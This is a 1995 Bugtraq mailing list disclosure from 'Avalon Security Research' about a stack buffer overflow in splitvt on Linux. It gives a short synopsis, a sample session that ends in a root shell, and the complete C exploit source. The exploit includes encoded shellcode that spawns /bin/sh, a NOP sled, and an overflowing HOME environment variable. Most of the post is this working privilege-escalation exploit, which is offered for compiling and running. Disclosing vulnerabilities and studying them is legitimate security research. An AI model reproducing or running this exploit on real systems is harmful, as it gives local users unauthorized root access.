[2434] in bugtraq
Avalon Release
daemon@ATHENA.MIT.EDU (root)
Tue Dec 5 01:49:14 1995
Date: Sun, 3 Dec 1995 22:52:37 -0700
Reply-To: Bugtraq List <BUGTRAQ@CRIMELAB.COM>
From: root <root@crimson.cadvision.com.crimelab.com>
X-To: Jeff Uphoff <juphoff@tarsier.cv.nrao.edu>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@CRIMELAB.COM>
In-Reply-To: <199512040028.TAA06752@tarsier.cv.nrao.edu>
Avalon Security Research
Release 1.3
(splitvt)
Affected Program: splitvt(1)
Affected Operating Systems: Linux 2-3.X
Exploitation Result: Local users can obtain superuser privelages.
Bug Synopsis: A stack overflow exists via user defined unbounds checked
user supplied data sent to a sprintf().
Syntax:
crimson~$ cc -o sp sp.c
crimson~$ sp
bash$ sp
bash$ splitvt
bash# whoami
root
Credit: Full credit for this bug (both the research and the code)
goes to Dave G. & Vic M. Any questions should be directed to
mcpheea@cadvision.com .
----------------------------------------------------------------------------
long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}
main()
{
char eggplant[2048];
int a;
char *egg;
long *egg2;
char realegg[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
char *eggie = realegg;
egg = eggplant;
*(egg++) = 'H';
*(egg++) = 'O';
*(egg++) = 'M';
*(egg++) = 'E';
*(egg++) = '=';
egg2 = (long *)egg;
for (a=0;a<(256+8)/4;a++) *(egg2++) = get_esp() + 0x3d0 + 0x30;
egg=(char *)egg2;
for (a=0;a<0x40;a++) *(egg++) = 0x90;
while (*eggie)
*(egg++) = *(eggie++);
*egg = 0; /* terminate eggplant! */
putenv(eggplant);
system("/bin/bash");
}
